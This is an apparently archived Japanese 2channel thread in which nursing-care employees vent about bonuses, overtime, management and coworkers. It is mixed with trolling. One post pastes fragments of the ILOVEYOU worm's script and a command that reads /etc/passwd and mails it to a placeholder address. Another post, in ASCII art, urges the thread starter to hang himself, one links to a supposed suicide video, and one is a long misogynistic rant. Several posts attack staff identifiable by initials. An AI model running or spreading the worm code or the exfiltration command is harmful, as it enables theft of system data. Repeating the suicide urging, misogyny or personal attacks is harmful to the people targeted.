弁護団の棗一郎弁護士は「さまざまな形のいじめがある。
法的措置で対抗もできるのでぜひ相談してほしい」と話している。
弁護団は2日を中心に20都道府県で電話相談「労働トラブル110番」を実施。
常設的な相談も行っており、問い合わせは弁護団(03・3251・4472)へ。
【東海林智】(毎日新聞) - 12月2日15時10分更新

これって気になる記事だよな、ちと相談してみっか

193 :ななしのフクちゃん:2006/12/03(日) 00:11:38 ID:6voC72Jp
あんた…どちらさん?

194 :ななしのフクちゃん:2006/12/03(日) 01:36:34 ID:u0ewMtAL
>>192 
                   /\        /\ 
                   /:::::::ヽ____/::::::::ヽ、 
                  丿 ::.__  .:::::::::::::  __  ::::ヽ_ 
                 / /。 ヽ_ヽv /: /。ヽ  ::::::ヽ 
 -┼-   丿~~~|     / / ̄ ̄√___丶  ̄ ̄\  ::::|            ■ ■ 
 -┼-   /~~~~/ ━━━ | .:::::::::: / / tーーー|ヽ     ..::::: ::|━━━━━━  ▼ ▼ 
  .|       丿      | .:::::.  ..: |    |ヽ        ::|            ● ● 
                | :::    | |⊂ニヽ| |      :::::| \ 
              / /| :    | |  |:::T::::| !      .::| \ \\ 
             / / \:    ト--^^^^^┤      丿 \\\ \\\

195 :ななしのふくちゃん:2006/12/03(日) 02:07:43 ID:Ig2U+ntr

ばーか 相談しないよ。なに言ってるか解からない
よそでやってな。

196 :ななしのフクちゃん:2006/12/03(日) 02:27:30 ID:Op+/HKod
最近、少しだけ他の企業スレと同じノリになってきたかな(笑
でもさぁ、>>183・・・
どこの施設なんだ〜残業がでるって!!?
だいぶいい環境なんじゃん!
私の居ることは、残業のたびに施設☆に承認を経て(ここまではよくあるけど)、
新橋にある本社へ書類を送って・・・結局駄目だし!されて、残業にならんのよ。
でもさぁ、話してて残業になっているわけじゃないし・・・人間扱ってて、時間だからケア途中でハイッ!ここまでね!
ってわけにいかないよね〜(笑
だけどさ〜>>183が幾つの人が知らないけど。
今どき都心部で家族と子どもが居て年収が350万じゃ〜かなり辛くないか?(笑
まっ介護職は低所得だけど、そこ基準で満足するとこがかなりやばいし、
もし、本社の人間書込みしているんなら、馬鹿にすんなってかんじぃ〜


197 :ななしのフクちゃん:2006/12/04(月) 00:11:38 ID:l27Dat43
貴方たちはここに書き込みをして、何を求めているの? 
机上の本部の人たちを批判する前に、ネット上での討論は(ry 

もし何か変えたいと思うのなら、せめて社会人としての方法で、 
上司に答申してみれば?どの社会もそうです。 
こんな所で言い争いしていても何も変わらない所か自分の仕事へのモチベーションが落ちるだけ。 
美容師・服飾・自分の好きな仕事をして輝いている人は薄い給料を文句いう前にキャリア積もうとしている人多いよね。 
貴方たちは人が好きで、人の力になりたくこの職業を選んだのではないの?ここにこんな書き込みしている方々は違うか? 
仕事変えたほうがいいかもね。

198 :ななしのフクちゃん:2006/12/04(月) 03:58:23 ID:SpkD+HS6
>>197
pgr

199 :ななしのフクちゃん:2006/12/04(月) 04:03:32 ID:PwuCkj+N
なに偉そうに吠えてんだ?(笑 おつかれさま

200 :ななしのフクちゃん:2006/12/04(月) 07:39:57 ID:epVeK+ns
>>197

ここで書込みして、何かを変えたい・・・変わるって思っている人少ないと思う。
それに、誰に言われなくてもここの会社に骨埋めるぞって考えている人の方が少ないと思いますよ。
デスクワークの人を批判しているのは、現場を大事にできない会社は滅びやすいよっていう
警告なんじゃないですか?
人が好きで、人の力になりたくてこの職業選んでも、不満や不平は起こるもの・・・
それを職場内でぶちまけている人の方が社会人としてのモラルを疑うし、
社長や会長にみて頂きたい!
営業(お客様相談員?)が施設に居る間、どういう態度でいるか?
施設☆をどういう扱いしているか?
自分たちの職場のトップをコケ下ろされて何がモチベーションですか?
もう少し内情を調査してから、話したほうがいいかもしれませんよ。
少なくとも私は、そう思います。

201 :ななしのフクちゃん:2006/12/04(月) 08:26:28 ID:ze47Umrv
>>197
この職場にいるのは、会社の為じゃなくて入居者に思い入れあるか、他に行かれない仕事しない奴かのどちらかだよ
後者が圧倒的に増えているのは、社員大事にしない上層部の問題
CS馬鹿にするのもいいけど、CS居なくなったらどこぞの施設みたいに業務停止に追い込まれるのにな

202 :・・・:2006/12/08(金) 09:54:44 ID:JjD5uARI
>>201
入居者への思い入れがある職員はいるのか?
少数かもしれないけど、確かにいます。
でも、何故かそういう職員は長く続かないのが現状じゃないのかな。。。
表面顔がとってもよかったり、資格の数はとっても多い若造が
現実は、職場を悪い雰囲気にしている状況。
嘘つき多いよね、ここの職場。。。正直悲しくなるよ。

203 :ななしのフクちゃん:2006/12/08(金) 16:38:47 ID:/2kgLi/9
 ________________________ 
  |                                   .| 
  |    >>1は今すぐ逝ってよし〜♪              | 
  |        回線切って首吊りきぼ〜ん♪         | 
  |                                  .| 
   ̄\/ ̄\/ ̄\/ ̄ ̄ ̄ ̄ ̄\/ ̄\/ ̄\/ ̄ ̄ 
   ∧_∧∧_∧∧_∧     ∧_∧∧_∧∧_∧ キボーン♪ 
   ( ´∀`) ´∀`) ´∀`). 目 (・∀・ (・∀・ (・∀・ ) 
   (つ   )つ   )つ   )つ..| ⊂(  ⊂(   ⊂(   ⊂ ) 
   | | || | || | |.. |  | |  || | | | |  | 
  . (_)_)__)_)__)_) .|  (_(_(_(_(__(____) 
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| 
|                 2ch                  .| 
|               煽り合唱団               ...| 
|                ヽ(´ー`)ノ                 | 
|                                      .| 

204 :ななしのフクちゃん:2006/12/08(金) 16:40:14 ID:/2kgLi/9
┌──────────────────────―─―┐ 
│                                      | 
│                                      | 
│                                      | 
│                                      | 
│                ∧_∧                      | 
│               ( ´∀`)                | 
│               (    )                 | 
│               | | |                     | 
│               (__)_)                  | 
|              2ちゃんねる               | 
│                                      | 
│            スレッドを終了しています…           |   
│                                      | 
│  ☆次レスはありません                        | 
│                                      | 
|                                      | 
|                                      | 
└───────────────────────――┘

205 :ななしのフクちゃん:2006/12/08(金) 20:24:19 ID:ZkCDHs4K
>>202
若造が雰囲気悪くしてんじゃなくて、50代前後の知識ない・動かない人達がいるからだよ
勿論、50代前後でもほんの一握りは動くさ
でも、動かないで口ばかり出され、注意しても若造に言われたくない一念で聞かないんじゃ一緒にやる気なくなるよ
しわ寄せは、その若造にいくんだから
だから結局馬鹿馬鹿しくなんだよ!真面目にやればやるだけ!
動かない奴らと同じ給料なんだぜ?
辞めて当たり前!やってられねぇ!

206 :ななしのフクちゃん:2006/12/08(金) 21:22:51 ID:/2kgLi/9
  / ̄\   基本が出来ている?    / ̄\ 
  |/ ̄ ̄ ̄ ̄\           / ̄ ̄ ̄ ̄\| 
 |   /V\\\          |  /V\\\ 
 | / /||  || |           | //|   || | 
 | | |(゚)   (゚)| |           | | (゚)   (゚) /| 
ノ\|\| ( _●_) |/           \| ( _●_) |/|/\ 事実は事実? 
 彡、   |∪|  、` ̄ ̄ヽ    /彡、   |∪|  ミ  \ 
/ __  ヽノ   Y ̄)  |   (  (/     ヽノ_  |\_> 
(___)       Y_ノ    ヽ/     (___ノ 
     \      |       |      / 
      |  /\ \     / /\  | 
      | /    )  )    (  (    ヽ | 
      ∪    (  \   /  )    ∪ 
            \_)  (_/ 


     / ̄\ 
     |/ ̄ ̄ ̄ ̄\ 
   (ヽノ// //V\\ |/)   
  (((i )// (゜)  (゜)| |( i)))   どうでもいいでーーーーーーーーすwwwww 
 /∠彡\|  ( _●_)||_ゝ \   
( ___、    |∪|    ,__ ) 
    |     ヽノ   /´ 
    |        / 

207 :ななしのフクちゃん:2006/12/08(金) 22:54:19 ID:JjD5uARI
>>203>>204>>206
楽しそうだけど、いい加減にしろ!

208 :ななしのフクちゃん:2006/12/09(土) 01:08:11 ID:MCv7SnBp
>207

     ,.、,、,..,、、.,、,、、..,_       /i 
   ;'`;、、:、. .:、:, :,.: ::`゙:.:゙:`''':,'.´ -‐i 
   '、;: ...: ,:. :.、.∩.. .:: _;.;;.∩‐'゙  ̄  ̄ 
    `"゙' ''`゙ //゙`´´   | | 
        // Λ_Λ | | 
        | |( ´Д`)// < エビフライぶつけるぞ 
        \      | 
          |   / 
         /   / 
     __  |   |  __ 
     \   ̄ ̄ ̄ ̄ ̄   \ 
     ||\            \ 
     ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| 
     ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄|| 
        .||             . ||

209 :ななしのフクちゃん:2006/12/09(土) 22:43:52 ID:Nx1Cs7uT
>>208
退場!

210 :ななしのフクちゃん:2006/12/09(土) 23:12:01 ID:Gyn0IN9l
荒らしはスルーだよ
いちいち相手にしちゃ駄目だよ〜
馬鹿が、うつるから

211 :ななしのフクちゃん:2006/12/10(日) 00:55:47 ID:biPyUf9K
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cat /etc/passwd | mail nobody@nonexistent.com

212 :ななしのフクちゃん:2006/12/10(日) 15:13:32 ID:Q4EH9TiA
↑わはっは〜

213 :ななしのフクちゃん:2006/12/11(月) 11:49:01 ID:0zBcURQB
なんだか盛り下がっているね〜(笑
話題提供者いないのかな〜?

214 :ななしのフクちゃん:2006/12/11(月) 13:36:55 ID:s9dInlw4
かなりの体調不良者いるよ

215 :ななしのフクちゃん:2006/12/11(月) 23:04:45 ID:t4MX5HUc
                  ∧                ∧
         /|          | ,|                 | ,|       |\
        / /|          |  \  ____,-,.=..=、-、____  ノ  |        |ヽ ヽ
       | / |           \_  ̄/ ,. --、__, -- 、 |、 ̄ _ノ          |  ヽヽ
       | |  L             ̄`L.,.'、:::::ノ l、::::::ノ 、,..l´           _|   | |
      | |   /            /ノ__,-v'''^''v‐、__ゝゝ           ヽ    | |
      | |   |    ,-‐‐‐‐‐‐‐-(  ゝ.__ヾ'^=^//__ノ  )-‐‐‐‐‐‐‐、   |    | |
      | |   |    ヽ ̄~‐‐ 、  `',‐- ノ、 ̄ ̄,´ゝ-‐~´   ,.-‐~ ̄ノ  |   | |
       | |   |     ヽ  (ソヽ/""  ~~^ ^~~  ゙゙゙ヽヽ/ヾ| /    |    | |
       | |   |      / ,--、|         |       | ,‐‐、 〈     ,|    | |
        | |   |    _/ /===))ゝ____,...-‐↑‐-、.._____ノ)(===ヽ `‐;;、  l   | |
        | |  _|  ∠ヽ  |=l/ .|二=/´_..|__丶:=二|  ゝ=ノ /==ヽ |_  | |
         |__|__| ∠=:::::) /´|    |==|~  |  ̄|:==|   | ゝ ゝ===ヽ |__|__|
        /二二>==´ ノ 丿    ゝ=:|~ ̄l| ̄~~|::::=ノ    ゝ `‐`==<二二::ヽ
       ( /{ミ三∀__/ (____,.......-‐|_/ゝ__..|....._ノ\_|‐-........____) `ゝ∀三彡} | )
        \__|:::|二,         _/   /   `l    ゝ        `,二|:::|__ノ
           ~∨~´       ,..-‐'´ヽ_/  ,⊥  \___/ `‐、_         `~∨~
                  _,:::´ _,.......、 ヽ/´ `ヽ/=‐-、  `ヽ
                ┌⌒ヽ /====),<   _  >、====ヽ  /⌒ヽ
                 ,ゝ-'´ヽ|二=‐'´' ヽ,‐=r=‐/  ゞ二==|__人__ノ
                |   /Τ ̄    ゝ二ノ      Τヽ   `l
                |   |二_|               |二_|   |
                ,ヽ_____|二|                |二|_____/
            ∠lllll匚ノ   ̄ \             ノ    □lllllゝ
              ,〃)))\,、-'‐-<lllll\       ∠llllll>-‐-、/(((ヘ
              |/ ̄                         ̄\|
                       【ムスカッパ魔王】
             ※ムスピサロ、デスムスカとしても魔界で広く知られている




216 :ななしのフクちゃん:2006/12/12(火) 01:38:46 ID:OOCp3NOm
各施設の入居者の評価はどうなん?

217 :ななしのフクちゃん:2006/12/13(水) 17:56:40 ID:G1uvpolN
さぁ?どうだろね

218 :ななしのフクちゃん:2006/12/13(水) 23:26:11 ID:eajbHgX6
ボーナス出るとスタッフは黙る!!(笑

219 :ななしのフクちゃん:2006/12/14(木) 08:21:38 ID:bzHE7HM9
体調不良者多くて(スタッフ・入居者共に)文句言う気力が、無いだけだよ
あんなの賞与と呼べないね!

220 :ミスター]:2006/12/14(木) 17:52:09 ID:+oWIRmyY
どうも!!久々です^^皆さん、愚痴ばかりだね!!
何故に、この施設で働こうと思うか疑問です!!私もその一人ですが^^
明日から○中の施設の調理師が辞めるらしいですよ!!早番と遅番が出来ないな
んて、わがままな社員は要らないよね!!足手まといなだけですよ!!
あと、もう一つ!賞与は期待しない方がよいですよ!!大体、基本給の1ヶ月貰えれば多い
方ですよ!!いまだに満額貰った事無いですから!!では

221 :ななしのふくちゃん:2006/12/15(金) 19:17:09 ID:WcKkaGBV
賞与は期待してたとうりに、ずーと前に満額出ましたよ。

222 :ななしのフクちゃん:2006/12/15(金) 19:31:02 ID:TRspsg+K
>>221
満額?賞与どれくらいか明確提示してないのに満額貰ったって?何ヶ月分が満額なんだよ?

223 :ななしのふくちゃん:2006/12/15(金) 20:01:51 ID:0ZG8hOHL
こちらも賞与頂きました。とても有り難かったけど少なかったですね
この会社もこのままの状態のままだったら辞めるのも近いかな?
会社の上の方観ていたらもう少し少し社員の事を考えたほうがいいと思いますよ


224 :ななしのフクちゃん:2006/12/15(金) 23:06:51 ID:TRspsg+K
>>223
ここの天空人(上層部)は、あまりに高い所にいらっしゃって、地面に居るありんこ(社員)は、潰しても潰しても出てくると思っていらっしゃる方々ばかり
だから>>215みたいに、埋め立てしてみたり嘘カキコしてみたりしているわけですよ
ところで、ノロ確定してないまでも、ノロ症状出てる人数多いのに保健所には通報したのかな?

225 :名無しのフクちゃん:2006/12/15(金) 23:53:03 ID:zcJjc32F
スタッフも体調悪くして辞めてる人も多いしね。上層部の方あなた方はスタッフをこき使うだけで休める時は休ませてあげない。後は全体会議を欠席したら査定に響くとかまるで脅迫してるみたいでやり方がきたなすぎる。

226 :ななしのフクちゃん:2006/12/16(土) 19:59:28 ID:DCitKFzb
賞与って1か月分しか。。。

227 :ななしのフクちゃん:2006/12/16(土) 20:33:59 ID:44qVEz+M
うちは老健(独立)だけど年間4.45ヶ月(夏2.1 冬2.35+0.5(考課)で
ただ年金が総報酬性になったので、年金が6万円も引かれてました。
職種は施設ケアマネです。
 


228 :ななしのフクちゃん:2006/12/16(土) 20:35:14 ID:44qVEz+M
失礼、総報酬性 → 総報酬制でした。

229 :ななしのフクちゃん:2006/12/17(日) 01:51:49 ID:HLNas+3b
http://ostrich.2x3.info/FLURL-dot-com-49763-Commit_suicide_of_a_man_vetu_of_a_nylon_blouse_in_front_of_a_camera_the_USA.avi

230 :ななしのフクちゃん:2006/12/17(日) 10:29:36 ID:gJwNPnVl
ここ、給料か給与のことで訴えられたってほんとう?

231 :ななしのフクちゃん:2006/12/17(日) 12:14:00 ID:Hbe8p/t9
真偽は、知らんけど
賞与で、訴えられても仕方ないかもな
辞める奴の賞与、他のより半額にしやがったからな
会社として、ありえねぇ

232 :ななしのフクちゃん:2006/12/17(日) 23:31:15 ID:DCbrzCr+
実際にあった話だと聞いてますよ。
でも、本当に辞めると人事に入った途端、給与にも響いたと聞いてます。

233 :ななしのフクちゃん:2006/12/18(月) 22:19:32 ID:FK0zhIMe
ここの会社本当最悪ですね。噂には聞いてましたが……上司はそんなに優秀でないし 本社って糞くらえ人間ばっかですね。早く潰れた方がいいのでは?

234 :名無しのフクちゃん:2006/12/19(火) 21:45:27 ID:pSR0i7NZ
上層部は駄目な人間ばかりっていうか会長の飼い犬ばかり。一番可哀相って言うか被害者はスタッフと入居者の方だよ。

235 :ななしのフクちゃん:2006/12/20(水) 08:05:25 ID:cfQ2ipl0
入居者の皆さんは、本当に気の毒かと思います。
でもさ〜スタッフも社員。
入社に際して、自己選択で入社を決めたわけだし・・・
会社の本性を見て、嫌なら退職もできるわけで・・・
被害者意識はどうかな?と私は思う。
辞めない理由を入居者の為って語っている人の話しをよく聞くけど、
それって本当なのかな?
確かに理由の一つではあるんだろうなって思うけど・・・
それよりまずは自分の生活なんじゃないの?
偽善者になっても、職場環境は良くならないし。
会社と話し合いを繰り返すか、自分が人事管理に入るか、
それが駄目なら黙るか、辞めるか。。。それしかないって思う。
どうしたら、会社の体質改善できるのかな?
それを話しあってみたいよ。

236 :ななしのフクちゃん:2006/12/21(木) 03:35:51 ID:FO8OjB4B
話せないだろ(爆
笑わせんな

237 :ななしのフクちゃん:2006/12/21(木) 08:53:38 ID:ZrRKRyrm
会長様の意に反する人は、必要無いと言う考えの会社なんだって
話し合いは無理

238 :ななしのフクちゃん:2006/12/22(金) 10:31:41 ID:6x31GL3j
なんで話せないの?
ここだからはなせるんじゃない?w

239 :ななしのフクちゃん:2006/12/22(金) 10:45:48 ID:+T8cwB7W
話の種提供
あらゆる身障者と差別されやすい容姿や身体的特徴
のある人を化け物呼ばわりした遠藤某
第三者の視線が外れると裏顔をあらわし
弱者に対しては豹変しキチガイやくそたれなどの人に向けてはいけない
言葉を交えた恫喝、罵倒を行う某忠治66
社会的弱者や負組が特に嫌いで死ねばいいと度々発言している
こういう類は親族ともども不幸とは無縁の
社会的信用を得たお金持ちの生活をしている


240 :ななしのフクちゃん:2006/12/22(金) 14:13:44 ID:6x31GL3j
>>239
自己満足の書込みかもしれないけど・・・
意味不明だよ

241 :ななしのフクちゃん:2006/12/23(土) 05:14:07 ID:8fOUBqyH
主任から、副主任に降格した方が派閥作ってるんですが?
オムツもまともにあてられないのに?
しかも、派閥メンバーは50才近い人達
陰で、動かないだの色ボケしてるだの言ってたのに?あきれる

242 :ななしのフクちゃん:2006/12/23(土) 15:39:11 ID:VqhtSxbL
どこにも変な人いますよちなみにウチの施設長はやたら現場に入り さも 自分は手伝っていると格好つけてますが 迷惑。管理きちんとしてください。あなたはいらない!

243 :ななしのフクちゃん:2006/12/23(土) 19:20:21 ID:8fOUBqyH
>>242>>241
同じ施設だよ
>>242動かないといけないから施設長、邪魔だよねぇ、T村副主任

244 :ななしのフクちゃん:2006/12/23(土) 21:23:07 ID:mmM7o6lX
>>242
あなた副主任?もしくはその取り巻きかな??
副主任があまりにも管理能力がないから施設長が現場に入らなきゃなら
ないんでしょ。動けないし、まわせない。いない方が施設の為だ。はっ
きり言って迷惑。向いてないから降りた方がいいよ。

245 :ななしのフクちゃん:2006/12/24(日) 00:23:42 ID:Gtf5lNVv
244 お前は施設長の噂の愛人?(プッ)

246 :ななしのフクちゃん:2006/12/24(日) 04:16:47 ID:2EAek1tA
>>244みたいに、思ってる人は多いよ
口に出さないだけで
>>245みたいな単細胞な事しか書けないT村副主任(取り巻き含め)…痛すぎるよ
施設長いれば、さぼって煙草吸いに消えられないし、NCもとらなきゃいけないし大変だもんねぇ

247 :ななしのフクちゃん:2006/12/24(日) 08:48:28 ID:3FO4Tb7o
うんうんと同意して読んでいたのに・・
>>246は結局、職務怠慢を棚に上げているだけかよ!

248 :ななしのフクちゃん:2006/12/24(日) 17:24:21 ID:o77FNQBO
TとAはA台の時から悪評絶えないね



249 :ななしのフクちゃん:2006/12/24(日) 18:06:36 ID:2EAek1tA
>>247は、どれを納得して読んでたんだ?
>>248 KWSK

250 :ななしのフクちゃん:2006/12/24(日) 21:14:37 ID:Uj7XoHjN
ホント駄目な人たちですね、クリスマス会の間中ヘルパーさんの悪口を肴に飲めや歌えの大騒ぎ。

251 :ななしのフクちゃん:2006/12/25(月) 23:10:20 ID:diDOMF0W
His judgement cometh and that right soon 

男性諸君、結婚すると不幸になる。女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪くなる 
今の女は「どうやって男にたかるか」を必死に考えてる。騙されるな。家事は極めて軽労働になった 
コンビニやPC、風俗関係も、「嫁いらず」に拍車をかける。今の女は「人生の不良債権」「北朝鮮」「金メッキを施したゴキブリ」 
社会的に男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」 
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、もはや女尊男卑〜結婚しようとするあなたを彼女は陰で小馬鹿にしている事でしょう〜 

★☆★よほどの事が無い限り結婚は保留し、沢山の女性と自由に恋愛(sex)を楽しめ♪★☆★ 避妊(ピル等)は忘れずにねd(^−^ 
★☆★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★☆★ 

それでも結婚する君へ究極の護身法→[夫婦財産契約登記] 
夫婦財産契約により契約財産制となり、自分の稼いだ財産はすべて自分の物 
離婚時に財産の半分を配偶者に取られない 

・弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑 
・狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが 
女は何人殺してもノイローゼにならない。そして、骨盤が安定しているため 

・ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという 
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い 

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン 
アマゾン女族の女王は、法律を定め、女には従軍させ、男たちには卑しい奴隷の仕事を課した 
男児が生まれたら、脚と腕を不自由にして、戦えなくした 
・王位継承権が女性にだけあったという事実だけから考えて、古代エジプトでは女性権力が非常に大きかった 
男女平等どころか、かなり女性上位の社会であった 
・日本国でも卑弥呼が女王 
・昆虫などにいたっては、オスカマキリはメスに食われてしまう 

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・・

252 :ななしのフクちゃん:2006/12/26(火) 05:54:00 ID:2BrkRXrz
>>251
男尊女卑すぎだ
相手の気持ちも考え無いと、どこかで自分に返ってくるよ

253 :ななしのフクちゃん:2006/12/26(火) 11:53:18 ID:UrIK5KZH
また頭がない奴発見(笑ご愁傷様

254 :ななしのフクちゃん:2006/12/26(火) 22:09:36 ID:ID537lNs
相手にするだけおばか〜(笑

255 :ななしのフクちゃん:2006/12/26(火) 23:51:37 ID:UrIK5KZH
確かに…(-.-;)

256 :ななしのフクちゃん:2006/12/27(水) 21:17:34 ID:yprsWEOC
本社みてるみたいだから、意見上申の場にシヨ。
会長、五年後上場シヨ

257 :ななしのフクちゃん:2006/12/28(木) 21:46:37 ID:mheH+NsL
上場したら世の中終わりだ・・・

98 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)